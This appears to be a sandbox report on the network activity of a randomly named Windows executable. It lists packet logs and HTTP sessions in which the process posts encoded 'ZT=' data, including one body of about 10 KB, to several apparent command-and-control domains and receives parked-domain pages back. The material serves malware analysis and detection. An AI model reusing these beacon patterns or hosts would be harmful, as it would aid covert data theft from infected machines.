                                                                                                                                                                              Oct 30, 2024 08:12:48.894921064 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.894942045 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.895000935 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.895370960 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.895426035 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:49.786458015 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.802957058 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.808407068 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:50.808665037 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.816328049 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.821629047 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.442913055 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.442933083 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.443226099 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.443228006 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.443296909 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.446206093 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.451498985 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:56.721582890 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.727075100 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:56.727149010 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.739907026 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.745228052 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609009027 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609025955 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609038115 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609051943 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609083891 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.609108925 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609122992 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609138966 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.609217882 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609230042 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609246016 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.610013962 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.749516010 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.749686003 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:58.252809048 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.272408009 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.277915955 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:59.278007030 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.292188883 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.297616005 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169521093 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169542074 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169559956 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169579983 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169595957 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169610023 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169619083 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.169625998 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169656038 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.169758081 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169863939 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.309528112 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.309590101 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.799560070 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.866041899 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.871555090 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.871715069 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.882767916 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.888169050 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888180971 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:40.775918007 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.781389952 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:40.781586885 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.799501896 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.804965019 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.790015936 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.851526022 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:41.995016098 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.995068073 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:42.315155983 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.333878994 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.339520931 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.339644909 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.354258060 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.359803915 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359853029 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359951019 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359985113 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360013008 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360039949 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360066891 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360116959 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360145092 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.345587969 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.467456102 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:44.564929008 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.565004110 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:44.865087032 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.881563902 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.887310982 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:45.887428045 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.896469116 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.901947975 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:46.886544943 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:46.940067053 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.090626955 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:47.092147112 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.095977068 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.102293968 CET8050059152.42.255.48192.168.2.4
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:10:32.326267004 CET | 446 | OUT | GET /nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.iampinky.info
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:10:32.953885078 CET | 394 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 30 Oct 2024 07:10:32 GMT
Content-Type: text/html
Content-Length: 254
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49794 | 103.120.80.111 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:10:49.047422886 CET | 704 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: ZT=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49810 | 103.120.80.111 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:10:51.605058908 CET | 724 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: ZT=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvq4xAhNAxtwSBBwXj2D7XZnsoylwbykbGaSTUHJMMoauBxBEHo+ivUWK+bxcA1v9r/JpCRYYPXkjzQh/P/gNWRERzDs+9bIR9+i81kvSsjtY8g813jVygzl0mEsiSd7yLky367lpB6B3SWshn/zY8m22J48UErKvW8gVrRVw6FSHc4w=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49826 | 103.120.80.111 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:10:54.154606104 CET | 10806 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10299
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: ZT= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49840 | 103.120.80.111 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:10:56.692476034 CET | 443 | OUT | GET /3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:10:57.668732882 CET | 1236 | IN | HTTP/1.1 200 OK
Server: wts/1.7.0
Date: Wed, 30 Oct 2024 07:11:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: "65517fce-1a10"
Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>cotti.club-(www.west.cn)</title> <meta name="description" content="cotti.club," /> <meta name="keywords" content="cotti.club," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
Oct 30, 2024 08:10:57.668751001 CET | 1236 | IN | Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd, ul,
Oct 30, 2024 08:10:57.668764114 CET | 1236 | IN | Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
Oct 30, 2024 08:10:57.668864012 CET | 636 | IN | Data Ascii: ize: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color:
Oct 30, 2024 08:10:57.668876886 CET | 1236 | IN | Data Ascii: } .contact { margin-left: 50px } .contact p { line-height: 40px } a { text-decoration: none; } .t
Oct 30, 2024 08:10:57.668939114 CET | 1236 | IN | Data Ascii: <div class="footer-link" id="J_footerLink"> <a href="https://www.west.cn/services/domain/" target="_blank"></a> <span>|</span> <a href="https://www.west.cn/jiaoyi/" target="_bla
Oct 30, 2024 08:10:57.668945074 CET | 72 | IN | Data Ascii: tBefore(hm, s); })(); </script></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49876 | 217.160.0.60 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:02.927584887 CET | 719 | OUT | POST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=3m4IRk8oT3XLHqE6frRb1+pw3PnD2Ay1hbwRT8PVtNVh3DVT/3QJKgxoC+SMVum5ijMTHJG2XKGzwFBh1V2/KyCOAgSrSYmXAvmSIpm2rXIQ9Gq2M1lxKjeGPfuib842hQMy+kVhp3nvFl6QOLyXNyBrNF/bt+lMTauGpOtLGhywVy2u4DkANCyb0abnVj9ZCg==
Oct 30, 2024 08:11:03.747900963 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:03 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49890 | 217.160.0.60 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:05.476934910 CET | 739 | OUT | POST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=3m4IRk8oT3XLVb06eIpb8+pz8vnDhQyxhb8RT4WQt7Nh3hdT+0IJDwxoKeSNNOn7ijBuHMm2XKSzwA9h0iCgYyDoBQSlPImXAvmSIqb+rWsQ92a2eEl2ADeJH/uif84yhQMM+mhfpyjvFkKQLKyWGyBpAl+ckPM7e6jFnu9sOQaudU70pyFXfCWopdSTYgAQZosJOYMUpmjjOxfnn3lc6Yg=
Oct 30, 2024 08:11:06.297595978 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:06 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49904 | 217.160.0.60 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:08.028850079 CET | 10821 | OUT | POST /diem/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.solarand.online
                                                                                                                                                                              Referer: http://www.solarand.online/diem/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:11:08.869854927 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:08 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49918 | 217.160.0.60 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:10.566611052 CET | 448 | OUT | GET /diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:11:11.413075924 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 4545
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:11 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:11.413149118 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                                                                                              Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                                                                                                              Oct 30, 2024 08:11:11.413183928 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                                                                                                              Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                                                                                                              Oct 30, 2024 08:11:11.413218975 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                                                                                                                              Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


Session ID: 9
Source IP: 192.168.2.4; Source Port: 49954
Destination IP: 161.97.142.144; Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

